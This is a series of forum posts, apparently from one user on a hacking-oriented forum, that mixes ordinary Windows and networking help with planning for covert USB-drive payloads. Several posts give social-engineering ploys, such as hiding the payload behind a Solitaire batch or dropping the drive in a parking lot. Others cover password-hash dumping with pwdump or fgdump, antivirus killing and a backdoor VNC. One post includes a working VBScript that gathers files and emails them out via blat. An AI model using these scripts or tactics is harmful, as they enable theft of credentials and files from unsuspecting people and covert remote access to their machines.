pseudobreed

If you keep getting different errors, it sounds like RAM. Essentially, if you have a spare computer sitting around that you know works fine, just swap parts from it until you find the hardware that is causing the problem. If you are running dual RAM chips, pull out one. If you still get the error, pull out the one and put the other one back in. If you still get the error, try RAM from another machine. If you still get BSOD after that, then start changing out the vid card, sound card, etc. These type of issues are hard to diagnose unless you are in front of the machine.

Im not sure about ADSL2+ as I dropped DSL a while ago. The provider here is no where near up to par. I picked up a cable modem and went with Comcast which has a strong hold monopoly going on around here. I wish Verizon would come a little more south and I would jump on the fiber band wagon.

You dont have to login to the server, just login to a session to the server. Im not at work so I dont have a network to try this out on, but try typing the following in console: net use SERVERIPAdmin$ /user:Administrator Replace SERVERIP with your server's IP. It will prompt you for a password. You can not use an account that does not have a password. Sessions require passwords. Now try to connect via computer manager and see if it will allow you to access the snap-ins. Once you are done, type the following in the console: net use SERVERIPAdmin$ /delete You are not deleting anything, it just deletes the session or disconnects you.

Im not sure what will be available over in the UK, but here I checked: - Bellsouth sent my parents a modem that ethernet and usb ports. - At work Netopia & Bellsouth both provided DSL modems with ethernet ports. - And, I still have a Westell 6100 modem from when I had Bellsouth DSL. (Great Modem, crap ISP). Westell Modems on Ebay

I have just checked 3 DSL modems, and they all have ethernet ports as well as USB. Something I did notice is, if USB is attached it ignores the ethernet. Cant have both at the sametime. If you have a modem with just USB, send that thing back and tell them you dont have USB with all the new U3 hacks floating about =). Im downloading the new DD-WRT now, so I guess I will find out in a second. *Actually, nevermind. My Comcast modem is down yet again (And customer support wants me to transfer the modem to another address considering I recently moved). You would think they would give ex-Comcast employees a break once and a while. Im going to move in again in a couple of weeks so Ill test it out then. Or maybe take my router over to a friends house.

I personally do not like software firewalls. I have never really seen one that does it's job very well. If I had to pick one, I would go with Sygate, which Symantec aquired sometime last year. All DSL modems have built in routers (NAT), dont mistake this as a firewall. Hardware firewalls are a little bit expensive, but save you in the long run. If you are on a budget, pickup a WRT54G. They are pretty cheap now and you can change the firmware to add more features (Like a firewall). At home I have a WRT54G router with DD-WRT firmware. Come to think about it, I need to update it. Here is the Wiki entry on the DD-WRT. It's full of features and you probably will not use 1/3rd of them. However, it's nice to know they are there. You could try and repair your OS. Here is a write up on how to repair XP but keep all the programs and such. It will just wipe the base OS, service packs, and restore points. Then if all else fails, wipe it and start from scratch. Also, Windows Explorer will check the network every once and a while to look for networked computers. You can turn this off by unchecking "Automatically search for network folders and printers" in the folder options. And, Windows time service goes and tries to sync the clock. That service can also be turned off. Im not sure what program is used to sync the time, maybe explorer. Other than that, I dont see why explorer should try and query the network unless you have other services such as hamachi or you are doing something on the network.

You could have a php upload script so users could make their own banners, and have the forum pic a random logo. Then again, it would probably end up not being work safe, scratch that idea.

Not on a non-u3 USB drive on Windows XP SP1. The only option left is to manually run the payload. The person on a SP1 machine using USB drives should be used to this anyways. You could add some social engineering in there "Oh, let me show you this game..." which is just a batch that calls the payload then runs sol.exe (Solitaire). They may look at you like you are crazy because you are raving about Solitaire, you will just have to continue playing it off. Just tell them you have uber micro in Solitare and they cant compete with you. Play Solitaire just long enough to get the payload done then tell them they win and go to minesweeper. =) You could do the samething with a picture instead of a game. P.S. - Anyone know the cheat in minesweeper that changed the top-left pixel black if it was a bomb?

Copy and paste the code into a .reg file Windows Registry Editor Version 5.00 [HKEY_CURRENT_USERSoftwareMicrosoftCommand Processor] "Autorun"="CD /D C:Windows" Change the Autorun value to the path that you want cmd to start in. Leave the "CD /D " part. That tells the console to CD, then go to a path. Use "" as an escape character.

Ill have to check out the code in pwdump and see if I can offer any help. Oh, and if you screw up your SAM again, use this. It has saved me before. Just burn the iso, and if you loose your accounts, boot from the CD and it can rebuild the SAM hashes. I have never got the thing to work changing the password, however, I have got it to work by just blanking out the password.

@Deveant pwdump does not dump out a product key. It dumps out the hashes in the SAM.

Very Nice. I thought my Memorex was toast when I deleted the U3 software off it and there was no LPInstaller for Memorex. I tested this with my payload and everything works just like the Cruzer.

Bah, I google'd it and it's from Tiny Firewall

Going to take a stab at this: PDVDServ is Power DVD I think wscntfy Is Windows Security tray icon telling you something is off alg.exe Is the application layer gateway, used for ics. UMX Im not sure, but wasnt that one of the exe encrypters mentioned before? svchost is common and it handles most of windows networking I actually had vnc running with the name svchost one time thinking it would make it easier to hide the application to anyone who checked the task manager. In actuallity, it made it harder to end the vnc process tree. It's much easier to just hide the application from showing up in the list. I see you are running xp 64. How do you like it? I had it going for a while until I noticed the overall performance drop. It's like Microsoft just layered 64bit functionality over a 32bit OS. And having two Program Files directories drove me nuts.

The one in the switchblade uses pwdump and it causes the same thing with lsass.exe I used fgdump and it checks to see if it can dump before actually attempting to do so. This way, if it can not it will not force the machine to shutdown and you just get a log file instead of the hashes. I want to try this on an Active Directory machine to see if it works on those accounts.

Ok, I played around with it and Error 5 means your local account does not have rights on the remote machine. You can fix this by either adding an account to the remote machine with the same credentials as the remote user or log in under the server's administrator account I just opened up Windows Explorer, typed the server's address and it gave me a login prompt. I logged in under the server's local admin account and the error 5 did not come up and I had full access to all the snap-ins. Im on Windows XP Pro And, I tried this on two different servers. Both are Windows 2000 and only one is running Active Directory. The other does not use AD to auth users. I also tried this on another XP machine and got the same error until I logged into their computer using their local admin account.

I have used RockXP many o times before for people who needed a computer rebuilt but lost their current XP product key, works great. The new version actually has a dumper built into, however, it's based off pwdump code and can throw the lsass.exe into berzerk mode that will shutdown the computer. The new version also will extract CD-Keys from other products such as Office XP. I just ran into the same problem you are having with compiling code. I used to have Visual Studio 2005 when I was a developer (Came with MSDN) and I can not seem to find it. So, I downloaded the free express edition and started coding in it. When it came time to build my project I was getting a crap load of errors and it could not find some of the headers I wanted to include (Mainly windows.h). I read up on why this was happening, and most people were having the same problem. I tried some fixes other posted but I never could get the thing to compile. I guess Im going to have to ride back up to my old work and borrow VS2005 again. * I just found this link. It has links to the new SDK's and how to compile off the command line. Im going to try this out later.

If the original was called the Switchblade, why is Darren calling the next version the USB Hacksaw? A scarey thought.

I know it's rude to reply to only answer with a question... However, are you using the remote desktop that is built into Windows? I used that thing a long time ago with Hamachi. It was a nightmare. I use VNC to manage the servers and computers. And, for the not so savvy clients I setup pcAnywhere so they can work out of the office. You will have to open up ports on the firewalls to use both the apps, however, only on the server side. The remote does not need the ports open on a PUSH firewall setup. I dont use a software firewall, however, Im sure you probably have to tell it to allow VNC/pcAnywhere to use the port. Here are some articles that may help: Geek to Live: Create your own virtual private network with Hamachi Geek to Live: How to control your home computer from anywhere Secure VNC remote access

The first thing that came to mind was to use the WMI. The following code will query the NetworkLoginProfile, check privileges of the current logged in user. If the privilege is equal to 2, then user account has admin rights and you can add the rest of the code there. Copy and paste code into a .vbs file. szComputer = "." Set objShell = WScript.CreateObject("WScript.Shell") Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!" & szComputer & "rootcimv2") Set colItems = objWMIService.ExecQuery ("Select * from Win32_NetworkLoginProfile") For Each objItem in colItems If objItem.Caption = objShell.ExpandEnvironmentStrings("%username%") Then If objItem.Privileges = 2 Then ' 0 - Guest ' 1 - User ' 2 - Administrator ' <INSERT REST OF CODE HERE> End If End If Next

That was my fault. Trying to pull off batch commands in vbscript. This works, and I actually tested it using blat instead of the echo command. Set FSO = CreateObject("Scripting.FileSystemObject") ReDim arrFiles(1) Set Folder = FSO.GetFolder(".") Set Files = Folder.Files For Each File in Files If CheckFile(File.Name, WSCript.Arguments(0)) Then If i > UBound(arrFiles) Then Redim Preserve arrFiles(i*2) arrFiles(i) = File.Path i = i + 1 End If Next ReDim Preserve arrFiles(i-1) Set WSHShell = Wscript.CreateObject("Wscript.Shell") For Each FileName In arrFiles Send = "blat.exe " & FileName & " -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099" 'WScript.Echo Send WSHShell.Run Send Next Private Function CheckFile (ByVal Name, ByVal Filter) CheckFile = False FilterPos = 1 NamePos = 1 Do If FilterPos > Len(Filter) Then CheckFile = NamePos > len(Name) Exit Function End If If Mid(Filter,FilterPos) = ".*" Then If NamePos > Len(Name) Then CheckFile = True Exit Function End If If Mid(Filter,FilterPos) = "." Then CheckFile = NamePos > Len(Name) Exit Function End If FilterCount = Mid(Filter,FilterPos,1) FilterPos = FilterPos + 1 Select Case FilterCount Case "*" CheckFile = CheckFile2(Name,NamePos,Filter,FilterPos) Exit Function Case "?" If NamePos <= Len(Name) And Mid(Name,NamePos,1) <> "." Then NamePos = NamePos + 1 Case Else If NamePos > Len(Name) Then Exit Function NameCount = Mid(Name,NamePos,1) NamePos = NamePos + 1 If Strcomp(FilterCount,NameCount,vbTextCompare) <> 0 Then Exit Function End Select Loop End Function Private Function CheckFile2 (ByVal Name, ByVal NamePos0, ByVal Filter, ByVal FilterPos0) FilterPos = FilterPos0 Do If FilterPos > Len(Filter) Then CheckFile2 = True Exit Function End If FilterCount2 = Mid(Filter,FilterPos,1) FilterPos = FilterPos + 1 If FilterCount2 <> "*" And FilterCount2 <> "?" Then Exit Do End If Loop If FilterCount2 = "." Then If Mid(Filter,FilterPos) = "*" Then CheckFile2 = True Exit Function End If If FilterPos > Len(Filter) Then CheckFile2 = InStr(NamePos0,Name,".") = 0 Exit Function End If End If For NamePos = NamePos0 To Len(Name) NameCount = Mid(Name,NamePos,1) If StrComp(FilterCount2,NameCount,vbTextCompare)=0 Then If CheckFile(Mid(Name,NamePos+1),Mid(Filter,FilterPos)) Then CheckFile2 = True Exit Function End If End If Next CheckFile2 = False End Function Just change the credentials for blat and everything should be ok.

The AVKiller almost needs a thread by itself. I tried it on one of my laptops running AntiVir and it did not kill it. Im not sure how discreet you are trying to make, however, these are the things that popped up on me. I use task schedular/at all the time so when I noticed the new task scheduled it caught my eye. This only happens when you use it withouth the switch and Im sure that is to gain system rights. A couple issues there, task schedule service has to be running and you have to have rights to the AT command. Also, when I run 'avkill -a' from the command line about 4-5 console windows pop up on my start menu. This laptop is running XP SP2 and AntiVir. Here is some info on AntiVir that may help Installed Directory: C:Program FilesAntiVir PersonalEdition Classic Main Process: C:Program FilesAntiVir PersonalEdition Classicavcenter.exe Modules: C:Program FilesAntiVir PersonalEdition Classicccmainrc.dll C:Program FilesAntiVir PersonalEdition Classicccgrdrc.dll Application Specific: build.dat - Build Number avewin32.dll - Search Engine antivir.vdf - Virus Definitions avcenter.exe - Control Center avconfig.exe - Config Center avscan.exe - Luke Filewalker avpack32.dll - Archive Library avguard.exe - AntiVir Guard avgnflt.sys - Filter sched.exe - Scheduler update.exe - Updater Services: AntiVirService - AntiVir PersonalEdition Classic Guard AntiVirScheduler - AntiVir PersonalEdition Classic Scheduler If there is anything else I can provide that will help let me know.

Instead of just ending the batch, why not call a goto that will exec applications that have dumps that could have changed (ie Internet History/Passwords, Email Client, Messengers, Keylogs). I do see what you are saying, no reason to pull off a full payload if you already have most of the info. I added an update to the payload that downloads a new payload and dumps info that may have changed and emails it out using blat. I personally didnt want to chance plugging the drive in again, especially if it was a physically difficult to get to the computer the first time. If only I could get a good NAT-NAT connection going, then the backdoor VNC will come handy much more when needing to remotely update the payload. At the moment, Im limited to computers that are on the same network. Like the user who walks away from his computer to get a refill at the local "hot-spot." Im dropping Hamachi as an option. I started to write an app that grabbed the hwnd of applications so I could delete the system tray icons, however, hamachi adds much more than just an icon, and Im sure if you can hide network adapters or not. Im going to check out OpenVPN now... Once I get that going. Im thinking about "loosing" the key in a parking lot and having blat just email once the payload is pulled off. Would be kind of interesting to see where it travels. Unless someone puts it in a machine that has no internet connect, then formats the drive to keep as their own.

I remember there being a proof of concept of where you could RPC the Wireless Zero Configuration Service and it would drop WEP and WPA in clear text. And, you could do it without being under an admin account. However, it only worked after the View Available Wireless Networks was opened. In June, Microsoft issued a patch that actually changes the time it holds this info in the cache. I didnt hear much about it after that, or even know if the exploit still works.